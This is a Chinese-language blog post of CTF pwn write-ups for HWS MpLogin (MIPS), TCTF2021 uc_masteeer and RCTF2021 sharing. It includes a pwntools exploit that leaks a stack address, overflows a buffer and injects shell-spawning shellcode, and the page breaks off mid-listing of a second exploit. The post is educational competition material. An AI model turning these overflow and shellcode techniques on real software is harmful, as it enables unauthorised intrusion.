<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.3.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="2021CTFWP下半年做了一些CTF题，没像这样写博客前整理的比较乱，这里汇总整理一下 MUSLmipsmips pwn首先得学习下Mips指令集，可以看这一篇 CTF-MIPS-入门指南 | 咲夜南梦’s 博客 (gdb.wiki) 以一个函数序言为例  首先会把ra fp等寄存器都用sw存到栈中 压入栈之后，执行move(这种指令，不懂直接google) 也可以查这个pdf ，这个是我见过最">
<meta property="og:type" content="article">
<meta property="og:title" content="zzrR0">
<meta property="og:url" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/index.html">
<meta property="og:site_name" content="zzrR0">
<meta property="og:description" content="2021CTFWP下半年做了一些CTF题，没像这样写博客前整理的比较乱，这里汇总整理一下 MUSLmipsmips pwn首先得学习下Mips指令集，可以看这一篇 CTF-MIPS-入门指南 | 咲夜南梦’s 博客 (gdb.wiki) 以一个函数序言为例  首先会把ra fp等寄存器都用sw存到栈中 压入栈之后，执行move(这种指令，不懂直接google) 也可以查这个pdf ，这个是我见过最">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119113231416.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119114213181.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119114534807.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119114842622.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119114914253.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119115410582.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119115449031.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119120127559.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119195849133.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119195942513.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119200656296.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119200727713.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119200746984.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119200821689.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119201133986.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119201217040.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119201233880.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119201302236.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119204109742.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119215845601.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119220003128.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119220439935.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119223115335.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119223147671.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119222422752.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120102146629.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120102214172.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120102236733.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120102746536.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120103328574.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120103447041.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120104202432.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120104343361.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112000595.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112122465.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112139312.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112249173.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112415392.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112426960.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112439119.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112518064.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112754577.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112827195.png">
<meta property="og:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220120112844370.png">
<meta property="og:updated_time" content="2022-01-20T03:52:19.673Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="zzrR0">
<meta name="twitter:description" content="2021CTFWP下半年做了一些CTF题，没像这样写博客前整理的比较乱，这里汇总整理一下 MUSLmipsmips pwn首先得学习下Mips指令集，可以看这一篇 CTF-MIPS-入门指南 | 咲夜南梦’s 博客 (gdb.wiki) 以一个函数序言为例  首先会把ra fp等寄存器都用sw存到栈中 压入栈之后，执行move(这种指令，不懂直接google) 也可以查这个pdf ，这个是我见过最">
<meta name="twitter:image" content="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/Blog/zzrR0-Blog/source/_posts/2021CTFWP/image-20220119113231416.png">






  <link rel="canonical" href="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title> | zzrR0</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">zzrR0</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br>关于</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2022/01/19/2021CTFWP/2021CTFWP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zzrR0">
      <meta itemprop="description" content="Why am i so cai.">
      <meta itemprop="image" content="/images/head.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zzrR0">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2022-01-19 11:23:35" itemprop="dateCreated datePublished" datetime="2022-01-19T11:23:35+08:00">2022-01-19</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2022-01-20 11:52:19" itemprop="dateModified" datetime="2022-01-20T11:52:19+08:00">2022-01-20</time>
              
            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2022/01/19/2021CTFWP/2021CTFWP/#comments" itemprop="discussionUrl">
                
                  <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2022/01/19/2021CTFWP/2021CTFWP/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2022/01/19/2021CTFWP/2021CTFWP/" class="leancloud_visitors" data-flag-title>
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数：</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="2021CTFWP"><a href="#2021CTFWP" class="headerlink" title="2021CTFWP"></a>2021CTFWP</h1><p>下半年做了一些CTF题，没像这样写博客前整理的比较乱，这里汇总整理一下</p>
<h2 id="MUSL"><a href="#MUSL" class="headerlink" title="MUSL"></a>MUSL</h2><h2 id="mips"><a href="#mips" class="headerlink" title="mips"></a>mips</h2><p>mips pwn首先得学习下Mips指令集，可以看这一篇</p>
<p><a href="http://blog.gdb.wiki/2019/12/31/CTF-MIPS-入门指南/#二、MIPS指令集" target="_blank" rel="noopener">CTF-MIPS-入门指南 | 咲夜南梦’s 博客 (gdb.wiki)</a></p>
<p>以一个函数序言为例</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119113231416.png" alt="image-20220119113231416"></p>
<p>首先会把ra fp等寄存器都用sw存到栈中</p>
<p>压入栈之后，执行move(这种指令，不懂直接google)</p>
<p>也可以查这个pdf ，这个是我见过最好用的mips指令参考</p>
<p><a href="https://www.dsi.unive.it/~gasparetto/materials/MIPS_Instruction_Set.pdf" target="_blank" rel="noopener">MIPS_Instruction_Set.pdf (unive.it)</a></p>
<p>这里清晰的说明了数据的流向</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119114213181.png" alt="image-20220119114213181"></p>
<p>这里压入栈之后，fp会被赋值成sp</p>
<p>尾声也很简单，先把fp赋值给sp恢复sp的栈帧，然后从栈上恢复各个寄存器，最后把进一步让sp+0x80以恢复栈帧，跳转到ra返回地址</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119114534807.png" alt="image-20220119114534807"></p>
<h3 id="HWS入营赛题-MpLogin"><a href="#HWS入营赛题-MpLogin" class="headerlink" title="HWS入营赛题 MpLogin"></a>HWS入营赛题 MpLogin</h3><p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119114842622.png" alt="image-20220119114842622"></p>
<p>主函数一共就调用了两个子函数</p>
<p>sub_400840</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119114914253.png" alt="image-20220119114914253"></p>
<p>这个函数里面存在信息泄露，问题出在read函数，第一次填满堆栈，第二次就可以泄露栈上信息</p>
<p><a href="https://github.com/Naetw/CTF-pwn-tips" target="_blank" rel="noopener">Naetw/CTF-pwn-tips: Here record some tips about pwn. Something is obsoleted and won’t be updated. Sorry about that. (github.com)</a></p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119115410582.png" alt="image-20220119115410582"></p>
<p>sub_400978</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119115449031.png" alt="image-20220119115449031"></p>
<p>注意v3到v2之间的偏移2C - 18只有14，因此接收0x24是太大了，这样可以先覆盖掉v3 ，下面的read就可以任意溢出了</p>
<p>调试程序，这里重新导向到hexdump是个不错的技巧</p>
<p>qemu-mipsel -g 1234 -L ./ Mplogin | hexdump -C</p>
<p>可以让输入输出这样打印出来</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119120127559.png" alt="image-20220119120127559"></p>
<p>然后用gdb远程调试挂载上去,这里架构如果我们-q制定了二进制文件的话是可以不设置的，会自动识别</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  gdb-multiarch -q ./Mplogin</span><br><span class="line">pwndbg: loaded 180 commands. Type pwndbg [filter] <span class="keyword">for</span> a list.</span><br><span class="line">pwndbg: created <span class="variable">$rebase</span>, <span class="variable">$ida</span> gdb <span class="built_in">functions</span> (can be used with <span class="built_in">print</span>/<span class="built_in">break</span>)</span><br><span class="line">Reading symbols from ./Mplogin...(no debugging symbols found)...<span class="keyword">done</span>.</span><br><span class="line">pwndbg&gt; <span class="built_in">set</span> architecture mips</span><br><span class="line">The target architecture is assumed to be mips</span><br><span class="line">pwndbg&gt; <span class="built_in">set</span> endian little</span><br><span class="line">The target is assumed to be little endian</span><br><span class="line">pwndbg&gt; b * 0x00400B88</span><br><span class="line">Breakpoint 1 at 0x400b88</span><br><span class="line">pwndbg&gt; target remote :1234</span><br></pre></td></tr></table></figure>
<p>xuan哥的exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">'mips'</span>,endian=<span class="string">'little'</span>,log_level=<span class="string">'debug'</span>)</span><br><span class="line">io = process([<span class="string">"qemu-mipsel"</span>,<span class="string">"-L"</span>,<span class="string">"./"</span>,<span class="string">"./Mplogin"</span>])</span><br><span class="line"></span><br><span class="line"><span class="comment"># leak stack(old fp)</span></span><br><span class="line">io.sendafter(<span class="string">"name : "</span>,<span class="string">"admin"</span>.ljust(<span class="number">0x18</span>,<span class="string">'a'</span>))</span><br><span class="line">io.recvuntil(<span class="string">"Correct name : "</span>);io.recv(<span class="number">0x18</span>)</span><br><span class="line">stack = u32(io.recv(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># stack overflow</span></span><br><span class="line">io.sendafter(<span class="string">"Pre_Password : "</span>,<span class="string">"access"</span>.ljust(<span class="number">0x14</span>,<span class="string">"2"</span>)+p32(<span class="number">0x100</span>))</span><br><span class="line">io.sendafter(<span class="string">"Password : "</span>,<span class="string">"0123456789"</span>.ljust(<span class="number">0x28</span>,<span class="string">"2"</span>)+p32(stack)+asm(shellcraft.sh()))</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<p>这里泄露出来的是当前调用子函数的上一个栈的栈帧，这无所谓，关键是，这个栈帧是在返回地址的上面4个字节的，所以</p>
<p>下面构造payload的时候,这里v4后面就是old fp 和返回地址，而v4是0x24长度,所以这里用0x28对齐到返回地址处，然后把stack的地址写入返回地址，这样就实现了控制流的劫持，而old fp实际上指的又是返回地址的下面四个字节，所以直接再把shellcode填上就行</p>
<h3 id="refs"><a href="#refs" class="headerlink" title="refs"></a>refs</h3><p><a href="https://xuanxuanblingbling.github.io/ctf/pwn/2020/09/24/mips/" target="_blank" rel="noopener">HWS赛题 入门 MIPS Pwn | Clang裁缝店 (xuanxuanblingbling.github.io)</a></p>
<h2 id="TCTF2021"><a href="#TCTF2021" class="headerlink" title="TCTF2021"></a>TCTF2021</h2><h3 id="uc-masteeer"><a href="#uc-masteeer" class="headerlink" title="uc_masteeer"></a>uc_masteeer</h3><p>这题是用unicorn编写的pwn题</p>
<p>学习unicorn可以参考这里的非官方文档</p>
<p><a href="https://hackmd.io/@K-atc/rJTUtGwuW?type=view" target="_blank" rel="noopener">Unicorn Engine Reference (Unofficial) - HackMD</a></p>
<p>先分析下里面的hook</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119195849133.png" alt="image-20220119195849133"></p>
<p>这里第一句的意思是添加指令hook，1和0是参数begin和end的位置，这里1&gt;0代表着跳过地址边界检查，也就是hook整个地址范围，UC_X86_INS_SYSCALL是Unicorn内置的参数，代表hookx86的系统调用</p>
<p>第二个hook是添加一个code执行的hook，hook的范围就是admin_offset到admin_offset+1</p>
<p>第三个hook是添加一个内存写入的hook</p>
<p>初始完内存数据以及添加hook之后</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119195942513.png" alt="image-20220119195942513"></p>
<p>用os.read读取用户输入，然后开始模拟执行，这里接收到的数据会写到CODE + 0x1000处</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119200656296.png" alt="image-20220119200656296"></p>
<p>admin_hook会判断is_admin是不是true，为true的话会重写入ADMIN的代码</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119200727713.png" alt="image-20220119200727713"></p>
<p>这里满足条件后可以命令执行cmd</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119200746984.png" alt="image-20220119200746984"></p>
<p>这里其实应该是unicorn hook系统调用的范式了(正好可以学习一下)，这里就是截获系统调用号，来分发到自己的函数上</p>
<p>题目自己实现的read和write</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119200821689.png" alt="image-20220119200821689"></p>
<p>这里两个输入输出函数就是实现的与os的交互，没什么特别的</p>
<p>这里肯定思路是触发hook_mem_access来执行命令，这里就得让admin为TRUE，因此得先触发admin_hook</p>
<p>具体怎么触发得看一下这些字节码都是在干什么，我们直接把字节码拷贝到010editor中，然后保存出来用IDA加载即可</p>
<p>IDA分析完之后，我们直接右键创建函数，然后F5就能看了</p>
<p> MAIN的逻辑</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119201133986.png" alt="image-20220119201133986"></p>
<p>这里do_syscall IDA不会显示具体的调用号，详细的我们可以看汇编，当然我们也可以直接猜就行，这里会让我们输入一个选项，2就是退出，3可以让我们写数据进模拟内存中，即patch功能，但是因为加了safe_write，所以我们只能写入栈区和CODE+0x1000 ~CODE+0x2000这块区域</p>
<p>Tail代码倒是没办法创建函数，但是可以大概看出其就是打印个祝贺</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119201217040.png" alt="image-20220119201217040"></p>
<p>Admin代码段</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119201233880.png" alt="image-20220119201233880"></p>
<p>大概就是打印出来Imagination Is，然后把下面k33nalab字符串的地址覆盖到0BABECAFE233上，再跳到BABECAFE000 +8的地址上，这个是在栈上</p>
<p>Admin的返回是直接跳到</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119201302236.png" alt="image-20220119201302236"></p>
<p>分析完代码就有思路了，我们首先执行patch功能，把跳表给改成Main函数，然后执行提权到Admin的功能，这样我们就是Admin了，同时程序会再次返回到Main函数，然后再次执行Patch，修改Admin函数代码中的</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119204109742.png" alt="image-20220119204109742"></p>
<p>这个字符串部分，让其变成我们要执行的指令，最后再次patch跳表到Admin函数代码，就可以触发admin_hook处的代码了</p>
<h3 id="listbook"><a href="#listbook" class="headerlink" title="listbook"></a>listbook</h3><h3 id="Refs"><a href="#Refs" class="headerlink" title="Refs"></a>Refs</h3><p><a href="https://www.cjovi.icu/WP/1515.html" target="_blank" rel="noopener">TCTF2021-uc_masteeer-WP - cj的小站 (cjovi.icu)</a></p>
<h2 id="RCTF2021"><a href="#RCTF2021" class="headerlink" title="RCTF2021"></a>RCTF2021</h2><h3 id="sharing"><a href="#sharing" class="headerlink" title="sharing"></a>sharing</h3><p>这题是C++题，chunk的基本结构</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119215845601.png" alt="image-20220119215845601"></p>
<p>Show和edit函数在程序里面会以虚表的形态存在</p>
<p>程序提供了一个后门功能，当输入choice为DEAD的时候，可以让任意地址的值-2</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119220003128.png" alt="image-20220119220003128"></p>
<p>不过前面要输入一个Hint来满足5ABB这个函数</p>
<p><img src="/2022/01/19/2021CTFWP/2021CTFWP/Blog\zzrR0-Blog\source\_posts\2021CTFWP\image-20220119220439935.png" alt="image-20220119220439935"></p>
<p>只要和是这个值就行</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span 